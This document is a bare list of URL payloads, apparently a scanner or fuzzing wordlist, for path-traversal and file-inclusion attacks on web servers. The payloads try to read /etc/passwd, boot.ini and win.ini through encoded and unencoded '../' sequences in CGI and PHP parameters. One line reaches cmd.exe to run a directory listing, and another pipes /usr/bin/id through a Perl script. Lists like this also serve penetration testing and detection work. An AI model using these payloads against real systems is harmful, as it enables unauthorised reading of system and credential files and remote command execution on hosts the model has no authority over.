/../../../../../../../../../boot.ini
/../../../../../../../../../boot.ini%00
///etc/passwd
////./../.../boot.ini
/index.php?|=../../../../../../../../../etc/passwd
/index.php?page=../../../../../../../../../../etc/passwd
/index.php?page=../../../../../../../../../../boot.ini
/index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd
/cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd
/cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
/cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
/..\..\..\..\..\..\temp\temp.class
/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini
/ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd
/ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c
/cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah
/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd